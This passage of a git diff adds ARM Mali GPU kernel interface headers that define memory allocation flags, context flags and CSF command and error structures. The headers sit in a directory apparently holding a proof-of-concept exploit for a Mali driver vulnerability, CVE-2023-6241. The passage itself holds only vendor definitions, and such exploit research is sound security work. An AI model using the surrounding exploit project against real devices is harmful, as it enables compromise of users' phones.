BASE_MEM_PROT_GPU_EX ((base_mem_alloc_flags)1 << 4) + +/* Will be permanently mapped in kernel space. + * Flag is only allowed on allocations originating from kbase. + */ +#define BASEP_MEM_PERMANENT_KERNEL_MAPPING ((base_mem_alloc_flags)1 << 5) + +/* The allocation will completely reside within the same 4GB chunk in the GPU + * virtual space. 
+ * Since this flag is primarily required only for the TLS memory which will + * not be used to contain executable code and also not used for Tiler heap, + * it can't be used along with BASE_MEM_PROT_GPU_EX and TILER_ALIGN_TOP flags. + */ +#define BASE_MEM_GPU_VA_SAME_4GB_PAGE ((base_mem_alloc_flags)1 << 6) + +/* Userspace is not allowed to free this memory. + * Flag is only allowed on allocations originating from kbase. + */ +#define BASEP_MEM_NO_USER_FREE ((base_mem_alloc_flags)1 << 7) + +/* Grow backing store on GPU Page Fault + */ +#define BASE_MEM_GROW_ON_GPF ((base_mem_alloc_flags)1 << 9) + +/* Page coherence Outer shareable, if available + */ +#define BASE_MEM_COHERENT_SYSTEM ((base_mem_alloc_flags)1 << 10) + +/* Page coherence Inner shareable + */ +#define BASE_MEM_COHERENT_LOCAL ((base_mem_alloc_flags)1 << 11) + +/* IN/OUT */ +/* Should be cached on the CPU, returned if actually cached + */ +#define BASE_MEM_CACHED_CPU ((base_mem_alloc_flags)1 << 12) + +/* IN/OUT */ +/* Must have same VA on both the GPU and the CPU + */ +#define BASE_MEM_SAME_VA ((base_mem_alloc_flags)1 << 13) + +/* OUT */ +/* Must call mmap to acquire a GPU address for the allocation + */ +#define BASE_MEM_NEED_MMAP ((base_mem_alloc_flags)1 << 14) + +/* IN */ +/* Page coherence Outer shareable, required. + */ +#define BASE_MEM_COHERENT_SYSTEM_REQUIRED ((base_mem_alloc_flags)1 << 15) + +/* Protected memory + */ +#define BASE_MEM_PROTECTED ((base_mem_alloc_flags)1 << 16) + +/* Not needed physical memory + */ +#define BASE_MEM_DONT_NEED ((base_mem_alloc_flags)1 << 17) + +/* Must use shared CPU/GPU zone (SAME_VA zone) but doesn't require the + * addresses to be the same + */ +#define BASE_MEM_IMPORT_SHARED ((base_mem_alloc_flags)1 << 18) + +/* Should be uncached on the GPU, will work only for GPUs using AARCH64 mmu + * mode. Some components within the GPU might only be able to access memory + * that is GPU cacheable. Refer to the specific GPU implementation for more + * details. The 3 shareability flags will be ignored for GPU uncached memory. + * If used while importing USER_BUFFER type memory, then the import will fail + * if the memory is not aligned to GPU and CPU cache line width. + */ +#define BASE_MEM_UNCACHED_GPU ((base_mem_alloc_flags)1 << 21) + +/* + * Bits [22:25] for group_id (0~15). + * + * base_mem_group_id_set() should be used to pack a memory group ID into a + * base_mem_alloc_flags value instead of accessing the bits directly. + * base_mem_group_id_get() should be used to extract the memory group ID from + * a base_mem_alloc_flags value. + */ +#define BASEP_MEM_GROUP_ID_SHIFT 22 +#define BASE_MEM_GROUP_ID_MASK ((base_mem_alloc_flags)0xF << BASEP_MEM_GROUP_ID_SHIFT) + +/* Must do CPU cache maintenance when imported memory is mapped/unmapped + * on GPU. Currently applicable to dma-buf type only. + */ +#define BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP ((base_mem_alloc_flags)1 << 26) + +/* OUT */ +/* Kernel side cache sync ops required */ +#define BASE_MEM_KERNEL_SYNC ((base_mem_alloc_flags)1 << 28) + +/* Number of bits used as flags for base memory management + * + * Must be kept in sync with the base_mem_alloc_flags flags + */ +#define BASE_MEM_FLAGS_NR_BITS 30 + +/* A mask for all output bits, excluding IN/OUT bits. + */ +#define BASE_MEM_FLAGS_OUTPUT_MASK BASE_MEM_NEED_MMAP + +/* A mask for all input bits, including IN/OUT bits. + */ +#define BASE_MEM_FLAGS_INPUT_MASK \ + (((1 << BASE_MEM_FLAGS_NR_BITS) - 1) & ~BASE_MEM_FLAGS_OUTPUT_MASK) + +/* Special base mem handles. 
+ */ +#define BASEP_MEM_INVALID_HANDLE (0ul) +#define BASE_MEM_MMU_DUMP_HANDLE (1ul << LOCAL_PAGE_SHIFT) +#define BASE_MEM_TRACE_BUFFER_HANDLE (2ul << LOCAL_PAGE_SHIFT) +#define BASE_MEM_MAP_TRACKING_HANDLE (3ul << LOCAL_PAGE_SHIFT) +#define BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE (4ul << LOCAL_PAGE_SHIFT) +/* reserved handles ..-47< for future special handles */ +#define BASE_MEM_COOKIE_BASE (64ul << LOCAL_PAGE_SHIFT) +#define BASE_MEM_FIRST_FREE_ADDRESS ((BITS_PER_LONG << LOCAL_PAGE_SHIFT) + BASE_MEM_COOKIE_BASE) + +/* Flags to pass to ::base_context_init. + * Flags can be ORed together to enable multiple things. + * + * These share the same space as BASEP_CONTEXT_FLAG_*, and so must + * not collide with them. + */ +typedef __u32 base_context_create_flags; + +/* Flags for base context */ + +/* No flags set */ +#define BASE_CONTEXT_CREATE_FLAG_NONE ((base_context_create_flags)0) + +/* Base context is embedded in a cctx object (flag used for CINSTR + * software counter macros) + */ +#define BASE_CONTEXT_CCTX_EMBEDDED ((base_context_create_flags)1 << 0) + +/* Base context is a 'System Monitor' context for Hardware counters. + * + * One important side effect of this is that job submission is disabled. + */ +#define BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED ((base_context_create_flags)1 << 1) + +/* Bit-shift used to encode a memory group ID in base_context_create_flags + */ +#define BASEP_CONTEXT_MMU_GROUP_ID_SHIFT (3) + +/* Bitmask used to encode a memory group ID in base_context_create_flags + */ +#define BASEP_CONTEXT_MMU_GROUP_ID_MASK \ + ((base_context_create_flags)0xF << BASEP_CONTEXT_MMU_GROUP_ID_SHIFT) + +/* Bitpattern describing the base_context_create_flags that can be + * passed to the kernel + */ +#define BASEP_CONTEXT_CREATE_KERNEL_FLAGS \ + (BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED | BASEP_CONTEXT_MMU_GROUP_ID_MASK) + +/* Flags for base tracepoint + */ + +/* Enable additional tracepoints for latency measurements (TL_ATOM_READY, + * TL_ATOM_DONE, TL_ATOM_PRIO_CHANGE, TL_ATOM_EVENT_POST) + */ +#define BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS (1 << 0) + +/* Indicate that job dumping is enabled. This could affect certain timers + * to account for the performance impact. + */ +#define BASE_TLSTREAM_JOB_DUMPING_ENABLED (1 << 1) + +#endif /* _UAPI_BASE_COMMON_KERNEL_H_ */ diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_csf_kernel.h b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_csf_kernel.h new file mode 100644 index 0000000..141b090 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_csf_kernel.h @@ -0,0 +1,608 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2020-2023 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. 
+ * + */ + +#ifndef _UAPI_BASE_CSF_KERNEL_H_ +#define _UAPI_BASE_CSF_KERNEL_H_ + +#include +#include "mali_base_common_kernel.h" + +/* Memory allocation, access/hint flags & mask specific to CSF GPU. + * + * See base_mem_alloc_flags. + */ + +/* Must be FIXED memory. */ +#define BASE_MEM_FIXED ((base_mem_alloc_flags)1 << 8) + +/* CSF event memory + * + * If Outer shareable coherence is not specified or not available, then on + * allocation kbase will automatically use the uncached GPU mapping. + * There is no need for the client to specify BASE_MEM_UNCACHED_GPU + * themselves when allocating memory with the BASE_MEM_CSF_EVENT flag. + * + * This memory requires a permanent mapping + * + * See also kbase_reg_needs_kernel_mapping() + */ +#define BASE_MEM_CSF_EVENT ((base_mem_alloc_flags)1 << 19) + +#define BASE_MEM_RESERVED_BIT_20 ((base_mem_alloc_flags)1 << 20) + + +/* Must be FIXABLE memory: its GPU VA will be determined at a later point, + * at which time it will be at a fixed GPU VA. + */ +#define BASE_MEM_FIXABLE ((base_mem_alloc_flags)1 << 29) + +/* Note that the number of bits used for base_mem_alloc_flags + * must be less than BASE_MEM_FLAGS_NR_BITS !!! + */ + +/* A mask of all the flags which are only valid for allocations within kbase, + * and may not be passed from user space. + */ +#define BASEP_MEM_FLAGS_KERNEL_ONLY \ + (BASEP_MEM_PERMANENT_KERNEL_MAPPING | BASEP_MEM_NO_USER_FREE) + +/* A mask of all currently reserved flags + */ +#define BASE_MEM_FLAGS_RESERVED BASE_MEM_RESERVED_BIT_20 + +/* Special base mem handles specific to CSF. + */ +#define BASEP_MEM_CSF_USER_REG_PAGE_HANDLE (47ul << LOCAL_PAGE_SHIFT) +#define BASEP_MEM_CSF_USER_IO_PAGES_HANDLE (48ul << LOCAL_PAGE_SHIFT) + +#define KBASE_CSF_NUM_USER_IO_PAGES_HANDLE \ + ((BASE_MEM_COOKIE_BASE - BASEP_MEM_CSF_USER_IO_PAGES_HANDLE) >> \ + LOCAL_PAGE_SHIFT) + +/* Valid set of just-in-time memory allocation flags */ +#define BASE_JIT_ALLOC_VALID_FLAGS ((__u8)0) + +/* flags for base context specific to CSF */ + +/* Base context creates a CSF event notification thread. + * + * The creation of a CSF event notification thread is conditional but + * mandatory for the handling of CSF events. + */ +#define BASE_CONTEXT_CSF_EVENT_THREAD ((base_context_create_flags)1 << 2) + +/* Bitpattern describing the ::base_context_create_flags that can be + * passed to base_context_init() + */ +#define BASEP_CONTEXT_CREATE_ALLOWED_FLAGS \ + (BASE_CONTEXT_CCTX_EMBEDDED | \ + BASE_CONTEXT_CSF_EVENT_THREAD | \ + BASEP_CONTEXT_CREATE_KERNEL_FLAGS) + +/* Flags for base tracepoint specific to CSF */ + +/* Enable KBase tracepoints for CSF builds */ +#define BASE_TLSTREAM_ENABLE_CSF_TRACEPOINTS (1 << 2) + +/* Enable additional CSF Firmware side tracepoints */ +#define BASE_TLSTREAM_ENABLE_CSFFW_TRACEPOINTS (1 << 3) + +#define BASE_TLSTREAM_FLAGS_MASK (BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS | \ + BASE_TLSTREAM_JOB_DUMPING_ENABLED | \ + BASE_TLSTREAM_ENABLE_CSF_TRACEPOINTS | \ + BASE_TLSTREAM_ENABLE_CSFFW_TRACEPOINTS) + +/* Number of pages mapped into the process address space for a bound GPU + * command queue. A pair of input/output pages and a Hw doorbell page + * are mapped to enable direct submission of commands to Hw. 
+ */ +#define BASEP_QUEUE_NR_MMAP_USER_PAGES ((size_t)3) + +#define BASE_QUEUE_MAX_PRIORITY (15U) + +/* Sync32 object fields definition */ +#define BASEP_EVENT32_VAL_OFFSET (0U) +#define BASEP_EVENT32_ERR_OFFSET (4U) +#define BASEP_EVENT32_SIZE_BYTES (8U) + +/* Sync64 object fields definition */ +#define BASEP_EVENT64_VAL_OFFSET (0U) +#define BASEP_EVENT64_ERR_OFFSET (8U) +#define BASEP_EVENT64_SIZE_BYTES (16U) + +/* Sync32 object alignment, equal to its size */ +#define BASEP_EVENT32_ALIGN_BYTES (8U) + +/* Sync64 object alignment, equal to its size */ +#define BASEP_EVENT64_ALIGN_BYTES (16U) + +/* The upper limit for number of objects that could be waited/set per command. + * This limit is now enforced as internally the error inherit inputs are + * converted to 32-bit flags in a __u32 variable occupying a previously padding + * field. + */ +#define BASEP_KCPU_CQS_MAX_NUM_OBJS ((size_t)32) + +/* CSF CSI EXCEPTION_HANDLER_FLAGS */ +#define BASE_CSF_TILER_OOM_EXCEPTION_FLAG (1u << 0) +#define BASE_CSF_EXCEPTION_HANDLER_FLAGS_MASK (BASE_CSF_TILER_OOM_EXCEPTION_FLAG) + +/** + * enum base_kcpu_command_type - Kernel CPU queue command type. + * @BASE_KCPU_COMMAND_TYPE_FENCE_SIGNAL: fence_signal, + * @BASE_KCPU_COMMAND_TYPE_FENCE_WAIT: fence_wait, + * @BASE_KCPU_COMMAND_TYPE_CQS_WAIT: cqs_wait, + * @BASE_KCPU_COMMAND_TYPE_CQS_SET: cqs_set, + * @BASE_KCPU_COMMAND_TYPE_CQS_WAIT_OPERATION: cqs_wait_operation, + * @BASE_KCPU_COMMAND_TYPE_CQS_SET_OPERATION: cqs_set_operation, + * @BASE_KCPU_COMMAND_TYPE_MAP_IMPORT: map_import, + * @BASE_KCPU_COMMAND_TYPE_UNMAP_IMPORT: unmap_import, + * @BASE_KCPU_COMMAND_TYPE_UNMAP_IMPORT_FORCE: unmap_import_force, + * @BASE_KCPU_COMMAND_TYPE_JIT_ALLOC: jit_alloc, + * @BASE_KCPU_COMMAND_TYPE_JIT_FREE: jit_free, + * @BASE_KCPU_COMMAND_TYPE_GROUP_SUSPEND: group_suspend, + * @BASE_KCPU_COMMAND_TYPE_ERROR_BARRIER: error_barrier, + */ +enum base_kcpu_command_type { + BASE_KCPU_COMMAND_TYPE_FENCE_SIGNAL, + BASE_KCPU_COMMAND_TYPE_FENCE_WAIT, + BASE_KCPU_COMMAND_TYPE_CQS_WAIT, + BASE_KCPU_COMMAND_TYPE_CQS_SET, + BASE_KCPU_COMMAND_TYPE_CQS_WAIT_OPERATION, + BASE_KCPU_COMMAND_TYPE_CQS_SET_OPERATION, + BASE_KCPU_COMMAND_TYPE_MAP_IMPORT, + BASE_KCPU_COMMAND_TYPE_UNMAP_IMPORT, + BASE_KCPU_COMMAND_TYPE_UNMAP_IMPORT_FORCE, + BASE_KCPU_COMMAND_TYPE_JIT_ALLOC, + BASE_KCPU_COMMAND_TYPE_JIT_FREE, + BASE_KCPU_COMMAND_TYPE_GROUP_SUSPEND, + BASE_KCPU_COMMAND_TYPE_ERROR_BARRIER +}; + +/** + * enum base_queue_group_priority - Priority of a GPU Command Queue Group. + * @BASE_QUEUE_GROUP_PRIORITY_HIGH: GPU Command Queue Group is of high + * priority. + * @BASE_QUEUE_GROUP_PRIORITY_MEDIUM: GPU Command Queue Group is of medium + * priority. + * @BASE_QUEUE_GROUP_PRIORITY_LOW: GPU Command Queue Group is of low + * priority. + * @BASE_QUEUE_GROUP_PRIORITY_REALTIME: GPU Command Queue Group is of real-time + * priority. + * @BASE_QUEUE_GROUP_PRIORITY_COUNT: Number of GPU Command Queue Group + * priority levels. + * + * Currently this is in order of highest to lowest, but if new levels are added + * then those new levels may be out of order to preserve the ABI compatibility + * with previous releases. At that point, ensure assignment to + * the 'priority' member in &kbase_queue_group is updated to ensure it remains + * a linear ordering. + * + * There should be no gaps in the enum, otherwise use of + * BASE_QUEUE_GROUP_PRIORITY_COUNT in kbase must be updated. 
+ */ +enum base_queue_group_priority { + BASE_QUEUE_GROUP_PRIORITY_HIGH = 0, + BASE_QUEUE_GROUP_PRIORITY_MEDIUM, + BASE_QUEUE_GROUP_PRIORITY_LOW, + BASE_QUEUE_GROUP_PRIORITY_REALTIME, + BASE_QUEUE_GROUP_PRIORITY_COUNT +}; + +struct base_kcpu_command_fence_info { + __u64 fence; +}; + +struct base_cqs_wait_info { + __u64 addr; + __u32 val; + __u32 padding; +}; + +struct base_kcpu_command_cqs_wait_info { + __u64 objs; + __u32 nr_objs; + __u32 inherit_err_flags; +}; + +struct base_cqs_set { + __u64 addr; +}; + +struct base_kcpu_command_cqs_set_info { + __u64 objs; + __u32 nr_objs; + __u32 padding; +}; + +/** + * typedef basep_cqs_data_type - Enumeration of CQS Data Types + * + * @BASEP_CQS_DATA_TYPE_U32: The Data Type of a CQS Object's value + * is an unsigned 32-bit integer + * @BASEP_CQS_DATA_TYPE_U64: The Data Type of a CQS Object's value + * is an unsigned 64-bit integer + */ +typedef enum PACKED { + BASEP_CQS_DATA_TYPE_U32 = 0, + BASEP_CQS_DATA_TYPE_U64 = 1, +} basep_cqs_data_type; + +/** + * typedef basep_cqs_wait_operation_op - Enumeration of CQS Object Wait + * Operation conditions + * + * @BASEP_CQS_WAIT_OPERATION_LE: CQS Wait Operation indicating that a + * wait will be satisfied when a CQS Object's + * value is Less than or Equal to + * the Wait Operation value + * @BASEP_CQS_WAIT_OPERATION_GT: CQS Wait Operation indicating that a + * wait will be satisfied when a CQS Object's + * value is Greater than the Wait Operation value + */ +typedef enum { + BASEP_CQS_WAIT_OPERATION_LE = 0, + BASEP_CQS_WAIT_OPERATION_GT = 1, +} basep_cqs_wait_operation_op; + +struct base_cqs_wait_operation_info { + __u64 addr; + __u64 val; + __u8 operation; + __u8 data_type; + __u8 padding[6]; +}; + +/** + * struct base_kcpu_command_cqs_wait_operation_info - structure which contains information + * about the Timeline CQS wait objects + * + * @objs: An array of Timeline CQS waits. + * @nr_objs: Number of Timeline CQS waits in the array. + * @inherit_err_flags: Bit-pattern for the CQSs in the array who's error field + * to be served as the source for importing into the + * queue's error-state. + */ +struct base_kcpu_command_cqs_wait_operation_info { + __u64 objs; + __u32 nr_objs; + __u32 inherit_err_flags; +}; + +/** + * typedef basep_cqs_set_operation_op - Enumeration of CQS Set Operations + * + * @BASEP_CQS_SET_OPERATION_ADD: CQS Set operation for adding a value + * to a synchronization object + * @BASEP_CQS_SET_OPERATION_SET: CQS Set operation for setting the value + * of a synchronization object + */ +typedef enum { + BASEP_CQS_SET_OPERATION_ADD = 0, + BASEP_CQS_SET_OPERATION_SET = 1, +} basep_cqs_set_operation_op; + +struct base_cqs_set_operation_info { + __u64 addr; + __u64 val; + __u8 operation; + __u8 data_type; + __u8 padding[6]; +}; + +/** + * struct base_kcpu_command_cqs_set_operation_info - structure which contains information + * about the Timeline CQS set objects + * + * @objs: An array of Timeline CQS sets. + * @nr_objs: Number of Timeline CQS sets in the array. + * @padding: Structure padding, unused bytes. + */ +struct base_kcpu_command_cqs_set_operation_info { + __u64 objs; + __u32 nr_objs; + __u32 padding; +}; + +/** + * struct base_kcpu_command_import_info - structure which contains information + * about the imported buffer. + * + * @handle: Address of imported user buffer. + */ +struct base_kcpu_command_import_info { + __u64 handle; +}; + +/** + * struct base_kcpu_command_jit_alloc_info - structure which contains + * information about jit memory allocation. 
+ * + * @info: An array of elements of the + * struct base_jit_alloc_info type. + * @count: The number of elements in the info array. + * @padding: Padding to a multiple of 64 bits. + */ +struct base_kcpu_command_jit_alloc_info { + __u64 info; + __u8 count; + __u8 padding[7]; +}; + +/** + * struct base_kcpu_command_jit_free_info - structure which contains + * information about jit memory which is to be freed. + * + * @ids: An array containing the JIT IDs to free. + * @count: The number of elements in the ids array. + * @padding: Padding to a multiple of 64 bits. + */ +struct base_kcpu_command_jit_free_info { + __u64 ids; + __u8 count; + __u8 padding[7]; +}; + +/** + * struct base_kcpu_command_group_suspend_info - structure which contains + * suspend buffer data captured for a suspended queue group. + * + * @buffer: Pointer to an array of elements of the type char. + * @size: Number of elements in the @buffer array. + * @group_handle: Handle to the mapping of CSG. + * @padding: padding to a multiple of 64 bits. + */ +struct base_kcpu_command_group_suspend_info { + __u64 buffer; + __u32 size; + __u8 group_handle; + __u8 padding[3]; +}; + + +/** + * struct base_kcpu_command - kcpu command. + * @type: type of the kcpu command, one enum base_kcpu_command_type + * @padding: padding to a multiple of 64 bits + * @info: structure which contains information about the kcpu command; + * actual type is determined by @p type + * @info.fence: Fence + * @info.cqs_wait: CQS wait + * @info.cqs_set: CQS set + * @info.cqs_wait_operation: CQS wait operation + * @info.cqs_set_operation: CQS set operation + * @info.import: import + * @info.jit_alloc: JIT allocation + * @info.jit_free: JIT deallocation + * @info.suspend_buf_copy: suspend buffer copy + * @info.sample_time: sample time + * @info.padding: padding + */ +struct base_kcpu_command { + __u8 type; + __u8 padding[sizeof(__u64) - sizeof(__u8)]; + union { + struct base_kcpu_command_fence_info fence; + struct base_kcpu_command_cqs_wait_info cqs_wait; + struct base_kcpu_command_cqs_set_info cqs_set; + struct base_kcpu_command_cqs_wait_operation_info cqs_wait_operation; + struct base_kcpu_command_cqs_set_operation_info cqs_set_operation; + struct base_kcpu_command_import_info import; + struct base_kcpu_command_jit_alloc_info jit_alloc; + struct base_kcpu_command_jit_free_info jit_free; + struct base_kcpu_command_group_suspend_info suspend_buf_copy; + __u64 padding[2]; /* No sub-struct should be larger */ + } info; +}; + +/** + * struct basep_cs_stream_control - CSI capabilities. + * + * @features: Features of this stream + * @padding: Padding to a multiple of 64 bits. + */ +struct basep_cs_stream_control { + __u32 features; + __u32 padding; +}; + +/** + * struct basep_cs_group_control - CSG interface capabilities. + * + * @features: Features of this group + * @stream_num: Number of streams in this group + * @suspend_size: Size in bytes of the suspend buffer for this group + * @padding: Padding to a multiple of 64 bits. + */ +struct basep_cs_group_control { + __u32 features; + __u32 stream_num; + __u32 suspend_size; + __u32 padding; +}; + +/** + * struct base_gpu_queue_group_error_fatal_payload - Unrecoverable fault + * error information associated with GPU command queue group. + * + * @sideband: Additional information of the unrecoverable fault. + * @status: Unrecoverable fault information. + * This consists of exception type (least significant byte) and + * data (remaining bytes). One example of exception type is + * CS_INVALID_INSTRUCTION (0x49). 
+ * @padding: Padding to make multiple of 64bits + */ +struct base_gpu_queue_group_error_fatal_payload { + __u64 sideband; + __u32 status; + __u32 padding; +}; + +/** + * struct base_gpu_queue_error_fatal_payload - Unrecoverable fault + * error information related to GPU command queue. + * + * @sideband: Additional information about this unrecoverable fault. + * @status: Unrecoverable fault information. + * This consists of exception type (least significant byte) and + * data (remaining bytes). One example of exception type is + * CS_INVALID_INSTRUCTION (0x49). + * @csi_index: Index of the CSF interface the queue is bound to. + * @padding: Padding to make multiple of 64bits + */ +struct base_gpu_queue_error_fatal_payload { + __u64 sideband; + __u32 status; + __u8 csi_index; + __u8 padding[3]; +}; + +/** + * enum base_gpu_queue_group_error_type - GPU Fatal error type. + * + * @BASE_GPU_QUEUE_GROUP_ERROR_FATAL: Fatal error associated with GPU + * command queue group. + * @BASE_GPU_QUEUE_GROUP_QUEUE_ERROR_FATAL: Fatal error associated with GPU + * command queue. + * @BASE_GPU_QUEUE_GROUP_ERROR_TIMEOUT: Fatal error associated with + * progress timeout. + * @BASE_GPU_QUEUE_GROUP_ERROR_TILER_HEAP_OOM: Fatal error due to running out + * of tiler heap memory. + * @BASE_GPU_QUEUE_GROUP_ERROR_FATAL_COUNT: The number of fatal error types + * + * This type is used for &struct_base_gpu_queue_group_error.error_type. + */ +enum base_gpu_queue_group_error_type { + BASE_GPU_QUEUE_GROUP_ERROR_FATAL = 0, + BASE_GPU_QUEUE_GROUP_QUEUE_ERROR_FATAL, + BASE_GPU_QUEUE_GROUP_ERROR_TIMEOUT, + BASE_GPU_QUEUE_GROUP_ERROR_TILER_HEAP_OOM, + BASE_GPU_QUEUE_GROUP_ERROR_FATAL_COUNT +}; + +/** + * struct base_gpu_queue_group_error - Unrecoverable fault information + * @error_type: Error type of @base_gpu_queue_group_error_type + * indicating which field in union payload is filled + * @padding: Unused bytes for 64bit boundary + * @payload: Input Payload + * @payload.fatal_group: Unrecoverable fault error associated with + * GPU command queue group + * @payload.fatal_queue: Unrecoverable fault error associated with command queue + */ +struct base_gpu_queue_group_error { + __u8 error_type; + __u8 padding[7]; + union { + struct base_gpu_queue_group_error_fatal_payload fatal_group; + struct base_gpu_queue_error_fatal_payload fatal_queue; + } payload; +}; + +/** + * enum base_csf_notification_type - Notification type + * + * @BASE_CSF_NOTIFICATION_EVENT: Notification with kernel event + * @BASE_CSF_NOTIFICATION_GPU_QUEUE_GROUP_ERROR: Notification with GPU fatal + * error + * @BASE_CSF_NOTIFICATION_CPU_QUEUE_DUMP: Notification with dumping cpu + * queue + * @BASE_CSF_NOTIFICATION_COUNT: The number of notification type + * + * This type is used for &struct_base_csf_notification.type. 
+ */ +enum base_csf_notification_type { + BASE_CSF_NOTIFICATION_EVENT = 0, + BASE_CSF_NOTIFICATION_GPU_QUEUE_GROUP_ERROR, + BASE_CSF_NOTIFICATION_CPU_QUEUE_DUMP, + BASE_CSF_NOTIFICATION_COUNT +}; + +/** + * struct base_csf_notification - Event or error notification + * + * @type: Notification type of @base_csf_notification_type + * @padding: Padding for 64bit boundary + * @payload: Input Payload + * @payload.align: To fit the struct into a 64-byte cache line + * @payload.csg_error: CSG error + * @payload.csg_error.handle: Handle of GPU command queue group associated with + * fatal error + * @payload.csg_error.padding: Padding + * @payload.csg_error.error: Unrecoverable fault error + * + */ +struct base_csf_notification { + __u8 type; + __u8 padding[7]; + union { + struct { + __u8 handle; + __u8 padding[7]; + struct base_gpu_queue_group_error error; + } csg_error; + + __u8 align[56]; + } payload; +}; + +/** + * struct mali_base_gpu_core_props - GPU core props info + * + * @product_id: Pro specific value. + * @version_status: Status of the GPU release. No defined values, but starts at + * 0 and increases by one for each release status (alpha, beta, EAC, etc.). + * 4 bit values (0-15). + * @minor_revision: Minor release number of the GPU. "P" part of an "RnPn" + * release number. + * 8 bit values (0-255). + * @major_revision: Major release number of the GPU. "R" part of an "RnPn" + * release number. + * 4 bit values (0-15). + * @padding: padding to align to 8-byte + * @gpu_freq_khz_max: The maximum GPU frequency. Reported to applications by + * clGetDeviceInfo() + * @log2_program_counter_size: Size of the shader program counter, in bits. + * @texture_features: TEXTURE_FEATURES_x registers, as exposed by the GPU. This + * is a bitpattern where a set bit indicates that the format is supported. + * Before using a texture format, it is recommended that the corresponding + * bit be checked. + * @gpu_available_memory_size: Theoretical maximum memory available to the GPU. + * It is unlikely that a client will be able to allocate all of this memory + * for their own purposes, but this at least provides an upper bound on the + * memory available to the GPU. + * This is required for OpenCL's clGetDeviceInfo() call when + * CL_DEVICE_GLOBAL_MEM_SIZE is requested, for OpenCL GPU devices. The + * client will not be expecting to allocate anywhere near this value. + */ +struct mali_base_gpu_core_props { + __u32 product_id; + __u16 version_status; + __u16 minor_revision; + __u16 major_revision; + __u16 padding; + __u32 gpu_freq_khz_max; + __u32 log2_program_counter_size; + __u32 texture_features[BASE_GPU_NUM_TEXTURE_FEATURES_REGISTERS]; + __u64 gpu_available_memory_size; +}; + +#endif /* _UAPI_BASE_CSF_KERNEL_H_ */ diff --git a/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_kernel.h b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_kernel.h new file mode 100644 index 0000000..c0b4d50 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2023_6241/mali_base_kernel.h @@ -0,0 +1,287 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2010-2022 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. 
+ * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. + * + */ + +/* + * Base structures shared with the kernel. + */ + +#ifndef _UAPI_BASE_KERNEL_H_ +#define _UAPI_BASE_KERNEL_H_ + +#include + +#define BASE_MAX_COHERENT_GROUPS 16 + +/* Physical memory group ID for normal usage. + */ +#define BASE_MEM_GROUP_DEFAULT (0) + +/* Physical memory group ID for explicit SLC allocations. + */ +#define BASE_MEM_GROUP_PIXEL_SLC_EXPLICIT (2) + +/* Number of physical memory groups. + */ +#define BASE_MEM_GROUP_COUNT (16) + +/** + * typedef base_mem_alloc_flags - Memory allocation, access/hint flags. + * + * A combination of MEM_PROT/MEM_HINT flags must be passed to each allocator + * in order to determine the best cache policy. Some combinations are + * of course invalid (e.g. MEM_PROT_CPU_WR | MEM_HINT_CPU_RD), + * which defines a write-only region on the CPU side, which is + * heavily read by the CPU... + * Other flags are only meaningful to a particular allocator. + * More flags can be added to this list, as long as they don't clash + * (see BASE_MEM_FLAGS_NR_BITS for the number of the first free bit). + */ +typedef __u32 base_mem_alloc_flags; + + +struct base_mem_handle { + struct { + __u64 handle; + } basep; +}; + +/** + * enum base_mem_import_type - Memory types supported by @a base_mem_import + * + * @BASE_MEM_IMPORT_TYPE_INVALID: Invalid type + * @BASE_MEM_IMPORT_TYPE_UMM: UMM import. Handle type is a file descriptor (int) + * @BASE_MEM_IMPORT_TYPE_USER_BUFFER: User buffer import. Handle is a + * base_mem_import_user_buffer + * + * Each type defines what the supported handle type is. + * + * If any new type is added here ARM must be contacted + * to allocate a numeric value for it. + * Do not just add a new type without synchronizing with ARM + * as future releases from ARM might include other new types + * which could clash with your custom types. + */ +enum base_mem_import_type { + BASE_MEM_IMPORT_TYPE_INVALID = 0, + /* + * Import type with value 1 is deprecated. + */ + BASE_MEM_IMPORT_TYPE_UMM = 2, + BASE_MEM_IMPORT_TYPE_USER_BUFFER = 3 +}; + +/** + * struct base_mem_import_user_buffer - Handle of an imported user buffer + * + * @ptr: address of imported user buffer + * @length: length of imported user buffer in bytes + * + * This structure is used to represent a handle of an imported user buffer. + */ + +struct base_mem_import_user_buffer { + __u64 ptr; + __u64 length; +}; + +/* + * struct base_fence - Cross-device synchronisation fence. + * + * A fence is used to signal when the GPU has finished accessing a resource that + * may be shared with other devices, and also to delay work done asynchronously + * by the GPU until other devices have finished accessing a shared resource. + */ +struct base_fence { + struct { + int fd; + int stream_fd; + } basep; +}; + +/** + * struct base_mem_aliasing_info - Memory aliasing info + * + * @handle: Handle to alias, can be BASE_MEM_WRITE_ALLOC_PAGES_HANDLE + * @offset: Offset within the handle to start aliasing from, in pages. + * Not used with BASE_MEM_WRITE_ALLOC_PAGES_HANDLE. + * @length: Length to 